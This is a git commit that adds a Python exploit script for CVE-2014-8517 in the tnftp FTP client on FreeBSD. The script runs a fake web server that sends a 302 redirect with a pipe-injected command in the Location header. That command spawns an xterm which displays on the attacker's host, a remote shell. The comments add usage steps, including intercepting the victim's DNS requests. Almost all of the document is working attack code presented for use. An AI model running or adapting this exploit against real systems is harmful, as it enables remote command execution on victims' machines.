CVE-2014-8517

2017-06-02 10:35:35 +02:00
commit bd85db9c6d
2 changed files with 154 additions and 0 deletions
--- a/CVE-2014-8517_tnftp.py
+++ b/CVE-2014-8517_tnftp.py
@@ -0,0 +1,149 @@
+#!/usr/bin/env python2
+#
+# Exploit Title: [tnftp BSD exploit]
+# Date: [11/29/2014]
+# Exploit Author: [dash]
+# Vendor Homepage: [www.freebsd.org]
+# Version: [FreeBSD 8/9/10]
+# Tested on: [FreeBSD 9.3]
+# CVE : [CVE-2014-8517]
+ 
+# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
+# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
+#
+# 29 Nov 2014 by dash@hack4.org
+#
+# usage: 
+# 
+# redirect the vulnerable ftp client requests for http to your machine
+#
+# client will do something like: 
+# ftp http://ftp.freebsd.org/data.txt
+#
+# you will intercept the dns request and redirect victim to your fake webserver ip
+#
+# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1 
+# probably do also xhost+victimip
+#
+# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
+# 
+# sadly you cannot put a slash behind the | also www-encoded is not working
+# plus problems with extra pipes
+# this renders a lot of usefull commands useless
+# so xterm -display it was ;)
+#
+# *dirty* *dirdy* *dyrdy* *shell* !
+#
+ 
+import os
+import sys
+import time
+import socket
+ 
+ 
+def usage():
+	print "CVE-2014-8517 tnftp exploit"
+	print "by dash@hack4.org in 29 Nov 2014"
+	print
+	print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
+	print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
+ 
+#bind a fake webserver on 0.0.0.0 port 80
+def webserveRedirect(redirect):
+ 
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+	s.bind(("0.0.0.0",80))
+	s.listen(3)
+	h, c = s.accept()
+ 
+	#wait for request
+	#print h.recv(1024)
+ 
+	#send 302 
+	print "[+] Sending redirect :>"
+	h.send(redirect)
+	s.close()
+	return 0
+ 
+#bind a fake webserver on port %rport
+def deliverUgga(owned):
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+	s.bind(("0.0.0.0",rport))
+	s.listen(3)
+	h, c = s.accept()
+ 
+#   print h.recv(1024)
+	print "[+] Deliver some content (shell is spwaned now)"
+	h.send(owned)
+	s.close()
+ 
+	return 0
+ 
+owned="""HTTP/1.1 200 Found
+Date: Fri, 29 Nov 2014 1:00:03 GMT
+Server: Apache
+Vary: Accept-Encoding
+Content-Length: 5
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+ 
+ 
+ugga ugga
+"""
+ 
+if(os.getuid())!=0:
+	print "[-] Sorry, you need root to bind port 80!"
+	sys.exit(1)
+ 
+if len(sys.argv)<3:
+	usage()
+	sys.exit(1)
+ 
+rip = sys.argv[1]
+rport = int(sys.argv[2])
+revip = sys.argv[3]
+ 
+print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
+print "[+] Dont forget to run Xnest -ac :1"
+ 
+# ok, lets use xterm -display
+cmd = "xterm -display %s:1" % (revip)
+cmd = cmd.replace(" ","%20")
+ 
+print "[+] Payload: [%s]" % cmd
+ 
+redirect =  "HTTP/1.1 302\r\n"\
+		"Content-Type: text/html\r\n"\
+		"Connection: keep-alive\r\n"\
+		"Location: http://%s:%d/cgi-bin/|%s\r\n"\
+		"\r\n\r\n" % (rip,rport,cmd)
+ 
+#child process owned data delivery
+uggapid = os.fork()
+if uggapid == 0:
+	uggapid = os.getpid()
+	deliverUgga(owned)
+else:
+#child proces for webserver redirect
+	webpid = os.fork()
+	if webpid == 0:
+		webpid = os.getpid()
+		webserveRedirect(redirect)
+ 
+ 
+ 
+#childs, come home!
+try:
+	os.waitpid(webpid,0)
+except:
+	pass
+try:
+	os.waitpid(uggapid,0)
+except:
+	pass
+ 
+#oh wait :>
+time.sleep(5)
+